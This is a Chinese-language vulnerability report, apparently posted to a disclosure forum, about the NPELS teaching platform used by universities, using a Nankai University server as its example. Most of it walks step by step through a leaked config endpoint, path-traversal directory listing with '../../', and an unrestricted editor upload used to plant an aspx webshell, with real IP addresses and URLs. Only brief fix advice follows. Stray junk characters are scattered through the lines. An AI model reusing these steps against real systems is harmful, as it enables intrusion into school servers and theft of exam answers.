好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中- c- U5 y4 I! L' w+ ]8 v2 h% y) Z
7 _" e0 s+ o' r$ V* _$ k
详细说明:
! L# e9 h0 M) n; R( M
& r( f# o7 }8 j以南开大学的为例:
1 s V1 P6 k% S" L8 l) Qhttp://222.30.60.3/NPELS
& g" n+ e# d6 w% ~5 u4 XNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址) [0 G& i6 o$ @
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
/ ]! r: w ]" X. `8 n4 @<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
7 }4 i6 {! J9 @, M' l</setting>5 i2 Q) Z8 L6 \
及版本号
; J8 m$ J& V9 U+ |" h<add key="TVersion" value="1, 0, 0, 2187">
0 k5 n7 v; [6 s; n0 S4 [+ m; V; O1 E4 u</add>
; l- D2 b+ r" ]* V6 p直接访问
# d9 n$ G& h( P" w. f+ `! X- nhttp://222.30.60.3/NPELS/CommonService.asmx
* b6 d* H% ^$ h$ ]. J' s" g使用GetTestClientFileList操作,直接 HTTP GET 列目录:4 J" f A- g! D# z" w/ r( d/ h
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187+ _8 b j6 I1 m2 \& I8 p Q
进一步列目录(返回的网页很大,可以直接 wget 下来)0 h0 Y9 ]/ h' M$ V' g
http://222.30.60.3/NPELS/CommonS ... List?version=../../: n' E% V9 D! S e" N% u2 Y2 E
/ \% e. j$ B$ g7 F
发现" K% ~. u* ` a0 b, D, y3 h/ y
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
/ L( ]7 I# N) x可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头 d' Z2 J5 L8 Y/ y
上传后继续列目录找到木马地址直接访问即可
9 c8 S* b4 v2 c8 X% [7 d( `- H A; h3 t) s& ^
OOXX
4 Y: Q( e, V. K# d, y! c8 V
5 f9 \# R3 p4 \5 C( W: QGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
8 R3 n, J- b3 w3 p1 r8 B8 T4 k漏洞证明:# R( U! j. ]* a
$ e6 a/ }% k, K1 |5 R
列目录:
8 Q- B y+ K, ahttp://222.30.60.3/NPELS/CommonS ... List?version=../../) _( B9 J: m, m A) \9 h/ e
文件上传:; Y0 I& u0 T J, \
http://222.30.60.3/npelsv/editor/editor.htm
8 e- s- s x/ |. y+ r
) u3 c0 y9 l+ N上传木马:* P! @; J2 q, ^: _ p% j
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
. v2 j y( [. V( ^- m
) w1 G/ ]" C+ R* X! S( Y修复方案:; b9 f# j0 g+ k1 E/ @! g5 r
好像考试系统必须使用 CommonService.asmx
: |# Y% x& @3 x1 D/ H' @ c最好配置文件加密或者用别的方式不让它泄露出来
3 `9 |6 K7 x4 A$ _并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样$ v9 e1 f* b; I4 P
|